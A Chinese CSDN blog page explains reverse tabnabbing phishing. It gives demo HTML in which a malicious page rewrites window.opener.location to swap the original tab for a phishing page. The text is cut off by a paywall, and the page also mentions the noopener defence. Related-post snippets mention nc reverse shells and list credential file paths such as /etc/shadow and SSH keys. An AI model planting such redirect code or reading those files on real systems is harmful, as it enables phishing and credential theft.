Reverse Tabnabbing钓鱼

最新推荐文章于 2022-10-04 22:23:36 发布
最新推荐文章于 2022-10-04 22:23:36 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: 渗透杂项
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/104535225
版权
Reverse Tabnabbing是一种钓鱼攻击手段,通过创建多个页面,当用户点击正常页面时,会被重定向到恶意网站,而原本的页面变成钓鱼页面。攻击者利用浏览器特性来实现这一过程。为防止此类攻击,可以采取措施如在a标签中添加rel="noopener",或者在打开新窗口时设置opener为null。
摘要由CSDN通过智能技术生成

Reverse Tabnabbing钓鱼

  • 希望你以后能过得好,别辜负我一生不打扰

文章目录

原理:

使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点:
1、使用a标签,并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open

利用:

创建三个页面A\B\C

A
<html>
<title>正常网站</title>
 <body>
  <li><a href="http://localhost/b.html" target="_blank" >a标签</a></li>
  <button onclick="window.open('http://localhost/b.html')">window.open</button>
 </body>
</html>

B
<html>
<title>恶意网站</title>
 <body>
  <script>
   if (window.opener) {
      window.opener.location = "http://localhost/c.html
最低0.47元/天 解锁文章
SoulCat.
关注
专栏目录
Tabnabbing Fighter:Phishing Attack Protection-crx插件
03-23
保护您免受Tabnabbing网络钓鱼攻击 Tabnabbing战斗机:保护您免受Tabnabbing网络钓鱼攻击! 浏览安全快乐,无需担心标签被打扰! 了解什么是Tabnabbing-Tabnabbing是一种计算机利用和网络钓鱼攻击,通过假冒那些网站并说服用户该网站是真实的,说服用户向流行的网站提交其登录详细信息和密码。 该攻击利用了用户对选项卡的信任和对细节的不重视,并且使浏览器能够在页面加载后很长一段时间内在非活动选项卡中浏览页面的原始位置。 Tabnabbing与大多数网络钓鱼攻击的不同之处在于,用户不再记得某个选项卡是与登录页面无关的链接的结果,因为假冒的登录页面已加载到浏览器中一个长期打开的选项卡中。我们不希望的是,当我们不浏览时,我们一直在浏览的页面会在背后发生变化。 这会让我们感到惊讶。 支持语言:English
Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权
YouthBelief的博客
01-12 1684
0x00 环境准备 下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网
浅谈对tabnabbing漏洞的理解和利用
SoporAeternus12的博客
04-05 3978
最近在打vulnhub上的靶机的时候卡在了某个点,后来我去网上搜索相关攻略,发现了一个叫reverse tabnabbing的漏洞,由于我之前并没有学习过这个漏洞,所以写了这篇文章来记录一下对这个漏洞的学习成果。 漏洞原理和介绍 tabnabbing是一种钓鱼攻击漏洞,网上将该漏洞翻译为反向标签劫持攻击,大致原理就是黑客通过某种方法在页面A中植入一个a标签,也就是一个超链接,链接的指向是黑客精心准备的页面B,页面B的内容有一个javascript代码,内容就是window.opener.location=“
metasploit的SET的Credential Harvester Attack Method
天元喜羊羊的博客
05-29 1437
环境:BT5,XP或者Win7,IE6、IE8、谷歌浏览器 操作如下: root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001
napping靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-04 505
napping靶场渗透记录 Even admins can fall asleep on the job
Scroll Reverse
12-09
标题“Scroll Reverse”所指的是一个针对MacOS操作系统的应用程序,它的主要功能是解决用户在使用鼠标滚轮或触控板滚动时感到不便的问题。在MacOS系统中,默认情况下,滚轮向上滚动会向下移动页面,这与许多Windows...
什么是reverse常见的reverse有哪些
05-19
### 什么是“reverse”及其常见应用 “Reverse”一词来源于英语,其基本含义是“反转”或“颠倒”,即改变某个事物原有的排列顺序、方向等。在信息技术领域,“reverse”的应用场景非常广泛,涵盖了软件开发、数据...
9781788838849-MASTERING_REVERSE_ENGINEERING_reverseengineering_e
10-01
Mastering Reverse Engineering
javascript 数组排序函数sort和reverse使用介绍
10-26
JavaScript为数组提供了两个实用的方法来实现这些操作:`sort`和`reverse`。这两个方法虽然功能不同,但它们共同的作用是改变数组元素的顺序。 首先,我们来详细了解`reverse`方法。`reverse`方法的功能是对调数组...
Multi-Attack Web Method
天元喜羊羊的博客
06-29 2270
操作如下: root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10
《metasploit The PenetrationTester's Guide》读书笔记v2
aurora__的博客
04-26 693
转自吐司,原地址找不到了,希望作者看见能联系,给我个加上原博客地址的机会..笔芯❤️修订说明:v2版全面使用bt5 r1作为测试系统,对笔记中存在的众多错误和遗漏作了更正和补充;目录一.名词解释二.msf基础三.信息探测与收集四.基本漏洞扫描五.基础溢出命令六.METERPRETER七.避开杀软八.使用用户端攻击方式(client-side attacks)九.MSF 附加模块十.社会工程学工具集...
浏览器利用框架BeEF测试
★慕名斋★
11-07 2538
0×00 前言 http://www.vuln.cn/6966 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。 0×01 简介 工具主页:http://beefproject.com
Windows/Linux 下nc 反弹shell
热门推荐
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
HTTP响应头拆分攻击(又名曰CRLF注入)
SoulCat
06-11 4389
HTTP响应头拆分攻击(又名曰CRLF注入) 最虐不过等不到南康白起35岁,吴邪等不到张起灵。 漏洞概述: CRLF注入攻击是比较新颖的一种Web攻击方式,如Web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞等。主要是由于Web应用程序未对用户提交的数据进行严格过滤和检查,导致攻击者可以提交一些恶意字符如(CR、LF等)然后进行构造恶意代码进行攻击。 基本原理: CR:对应A...
任意文件下载常用路径
SoulCat
09-06 3223
任意文件下载常用路径 所爱隔山海,山海不可平,但海有舟可渡,山有径可行 LINUX: /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_ras.keystore /root/.ssh/known_hosts /etc/passwd /etc/shadow /etc/issue /etc/fstab /etc/host.conf...
黑名单文件上传绕过
SoulCat
10-24 1537
黑名单文件上传绕过 我在西北,一山又一山。与你相隔,一关又一关。 漏洞概述: .htaccess用于Apache .user.ini用于php 漏洞复现: .user.ini 原理: .user.ini将所有php文件自动包含任意木马文件执行。 使用条件: 只要以cgi/FastCGI/fpm模式运行的php,并且上传目录下要有正常可执行的php文件,都可以成功包含 上传1.user....
文件上传漏洞之勇闯20层地狱
SoulCat
03-11 742
文件上传漏洞之勇闯20层地狱 有些喜欢,就是麦田里曾降临过的风,只有当事人明了,而这的世界假装没发生。 文章目录文件上传漏洞之勇闯20层地狱简介:pass-01:pass-02:pass-03:pass-04:pass-05:pass-06:pass-06: 简介: upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。 项目地址:https...
perlscalar reverse
最新发布
08-11
在Perl语言中,`perlscalar reverse`是一个内置函数,主要用于反转字符串(或更准确地说,是将字符串中的字符顺序颠倒)。当你有一个字符串变量,并想获取其字符从后往前排列的新字符串,就可以使用`reverse`函数。例如: ```perl my $str = "Hello World!"; my $reversed_str = reverse $str; print "$reversed_str\n"; # 输出 "!dlroW olleH" ``` `reverse`不会改变原始字符串,而是返回一个新的反转后的字符串。如果你想要修改原字符串,可以把它赋值给自身: ```perl $str = reverse $str; ``` 请注意,`reverse`仅适用于一维数组(在这种情况下是一维字符数组)。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值